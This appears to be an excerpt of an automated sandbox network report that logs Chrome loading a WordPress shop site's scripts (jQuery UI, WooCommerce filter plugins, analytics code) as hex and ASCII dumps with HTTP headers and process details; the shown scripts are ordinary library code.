                                                                                                          2024-12-12 11:58:40 UTC8168INData Raw: 5b 68 5d 29 3b 6d 2e 70 75 73 68 28 5b 30 2c 30 2c 7a 67 5d 29 3b 6d 2e 70 75 73 68 28 5b 30 2c 63 61 28 67 29 2c 59 63 5d 29 3b 6d 2e 75 6e 73 68 69 66 74 28 5b 30 2c 30 2c 41 67 5d 29 3b 44 61 28 66 2c 6d 29 3b 2d 2d 68 7d 65 6c 73 65 20 69 66 28 68 26 32 29 7b 76 61 72 20 70 3d 74 28 65 29 3b 70 2e 6e 65 78 74 28 29 3b 70 2e 6e 65 78 74 28 29 3b 6c 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 68 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6d 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 70 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 66 6f 72 28 76 61 72 20 72 3d 6c 61 28 6b 29 2c 71 3d 72 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 71 3b 29 7b 76 61 72 20 76 3d 72 5b 71 5d 3b 76 3d 5b 5b 30 2c 30 2c 41 67 5d 2c 5b 6d 2c 6b 5b 76 5d 2c 70 5d 2c
                                                                                                          Data Ascii: [h]);m.push([0,0,zg]);m.push([0,ca(g),Yc]);m.unshift([0,0,Ag]);Da(f,m);--h}else if(h&2){var p=t(e);p.next();p.next();l=p.next().value;h=p.next().value;m=p.next().value;p=p.next().value;for(var r=la(k),q=r.length-1;0<=q;){var v=r[q];v=[[0,0,Ag],[m,k[v],p],
                                                                                                          2024-12-12 11:58:40 UTC8168INData Raw: 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2e 55 61 3b 65 3d 54 28 62 2c 64 29 26 26 21 68 61 28 62 5b 64 5d 29 3b 64 3d 62 5b 64 5d 21 3d 3d 28 66 7c 7c 59 29 28 76 6f 69 64 20 30 29 3b 72 65 74 75 72 6e 20 44 62 28 65 26 26 64 29 7d 2c 63 29 3b 72 65 74 75 72 6e 20 58 65 28 51 28 22 22 2c 63 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 71 28 61 29 7b 69 66 28 59 65 28 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 62 3d 76 71 28 61 29 2c 63 3d 62 2e 4b 66 3b 52 28 63 29 26 26 28 62 2e 4b 66 3d 6e 75 6c 6c 2c 77 71 28 61 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 62 2e 4b 66 3d 64 7d 29 29 3b 72 65 74 75 72 6e 20 63 3f 31 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 78 71 28 61 2c 62 2c 63 29 7b 69 66 28 28 76 6f 69 64 20 30 3d 3d 3d 63
                                                                                                          Data Ascii: e.next().value.Ua;e=T(b,d)&&!ha(b[d]);d=b[d]!==(f||Y)(void 0);return Db(e&&d)},c);return Xe(Q("",c))}function uq(a){if(Ye(a))return null;var b=vq(a),c=b.Kf;R(c)&&(b.Kf=null,wq(a).then(function(d){b.Kf=d}));return c?1:null}function xq(a,b,c){if((void 0===c
                                                                                                          2024-12-12 11:58:40 UTC3350INData Raw: 61 62 73 28 63 2e 70 6f 73 69 74 69 6f 6e 2e 79 2d 0a 62 2e 70 6f 73 69 74 69 6f 6e 2e 79 29 3b 62 3d 62 2e 74 69 6d 65 2d 63 2e 74 69 6d 65 3b 69 66 28 63 2e 65 6c 65 6d 65 6e 74 3d 3d 3d 64 26 26 32 3e 65 26 26 32 3e 61 26 26 31 45 33 3e 62 29 72 65 74 75 72 6e 21 31 7d 66 6f 72 28 3b 64 3b 29 7b 69 66 28 24 71 28 64 29 29 72 65 74 75 72 6e 21 31 3b 64 3d 64 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 3b 74 72 79 7b 69 66 28 63 3d 62 2e 74 61 72 67 65 74 7c 7c 62 2e 73 72 63 45 6c 65 6d 65 6e 74 29 21 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 26 26 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 63 3d 63 2e 64 6f 63 75 6d 65 6e 74 45 6c
                                                                                                          Data Ascii: abs(c.position.y-b.position.y);b=b.time-c.time;if(c.element===d&&2>e&&2>a&&1E3>b)return!1}for(;d;){if($q(d))return!1;d=d.parentElement}return!0}function ar(a,b){var c=null;try{if(c=b.target||b.srcElement)!c.ownerDocument&&c.documentElement?c=c.documentEl


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          146192.168.2.2449941147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:39 UTC710OUTGET /wp-includes/js/jquery/ui/slider.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:39 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:39 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10759
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:39 UTC10759INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 53 6c 69 64 65 72 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a
                                                                                                          Data Ascii: /*! * jQuery UI Slider 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?define(["j


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          147192.168.2.2449943147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:40 UTC620OUTGET /wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
                                                                                                          2024-12-12 11:58:40 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:40 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3265
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:40 UTC3265INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 63 6f 6c 6f 72 73 28 29 20 7b 0a 20 20 20 20 2f 2f 68 74 74 70 3a 2f 2f 6a 73 66 69 64 64 6c 65 2e 6e 65 74 2f 6a 74 62 6f 77 64 65 6e 2f 78 50 32 4e 73 2f 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 6f 6c 6f 72 5f 74 65 72 6d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 6c 6f 72 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 63 6f 6c 6f 72 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 6d 67 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 6d 67 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 67 20 3d 20 27 27 3b 0a 20 20 20 20
                                                                                                          Data Ascii: "use strict";function woof_init_colors() { //http://jsfiddle.net/jtbowden/xP2Ns/ jQuery('.woof_color_term').each(function () { var color = jQuery(this).data('color'); var img = jQuery(this).data('img'); var bg = '';


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          148192.168.2.2449944147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:40 UTC762OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touch-punch.min.js?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:40 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:40 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1284
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:40 UTC1284INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 54 6f 75 63 68 20 50 75 6e 63 68 20 30 2e 32 2e 33 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 e2 80 93 32 30 31 34 2c 20 44 61 76 65 20 46 75 72 66 65 72 6f 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6f 72 20 47 50 4c 20 56 65 72 73 69 6f 6e 20 32 20 6c 69 63 65 6e 73 65 73 2e 0a 20 2a 0a 20 2a 20 44 65 70 65 6e 64 73 3a 0a 20 2a 20 20 6a 71 75 65 72 79 2e 75 69 2e 77 69 64 67 65 74 2e 6a 73 0a 20 2a 20 20 6a 71 75 65 72 79 2e 75 69 2e 6d 6f 75 73 65 2e 6a 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 2c 65 2c 75 2c 6e 3b 66 75 6e 63 74 69 6f 6e 20 63 28 6f 2c 74 29 7b 76 61 72 20 65 2c 75 3b 31 3c 6f 2e 6f
                                                                                                          Data Ascii: /*! * jQuery UI Touch Punch 0.2.3 * * Copyright 20112014, Dave Furfero * Dual licensed under the MIT or GPL Version 2 licenses. * * Depends: * jquery.ui.widget.js * jquery.ui.mouse.js */!function(t){var o,e,u,n;function c(o,t){var e,u;1<o.o


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          149192.168.2.2449945147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:40 UTC620OUTGET /wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
                                                                                                          2024-12-12 11:58:40 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:40 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3545
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:40 UTC3545INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 69 6d 61 67 65 28 29 20 7b 0a 20 20 20 20 2f 2f 68 74 74 70 3a 2f 2f 6a 73 66 69 64 64 6c 65 2e 6e 65 74 2f 6a 74 62 6f 77 64 65 6e 2f 78 50 32 4e 73 2f 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 69 6d 61 67 65 5f 74 65 72 6d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 6d 61 67 65 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 69 6d 61 67 65 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 74 79 6c 65 73 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 27 73 74 79 6c 65 73 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 6d 61 67 65 2e 6c 65 6e 67
                                                                                                          Data Ascii: "use strict";function woof_init_image() { //http://jsfiddle.net/jtbowden/xP2Ns/ jQuery('.woof_image_term').each(function () { var image = jQuery(this).data('image'); var styles = jQuery(this).data('styles'); if (image.leng


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:06:57:48
                                                                                                          Start date:12/12/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                          Imagebase:0x7ff72e4a0000
                                                                                                          File size:3'001'952 bytes
                                                                                                          MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:1
                                                                                                          Start time:06:57:49
                                                                                                          Start date:12/12/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2008,i,16923723258563330455,8692166982377769583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
                                                                                                          Imagebase:0x7ff72e4a0000
                                                                                                          File size:3'001'952 bytes
                                                                                                          MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:5
                                                                                                          Start time:06:57:55
                                                                                                          Start date:12/12/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://annavirgili.com"
                                                                                                          Imagebase:0x7ff72e4a0000
                                                                                                          File size:3'001'952 bytes
                                                                                                          MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          No disassembly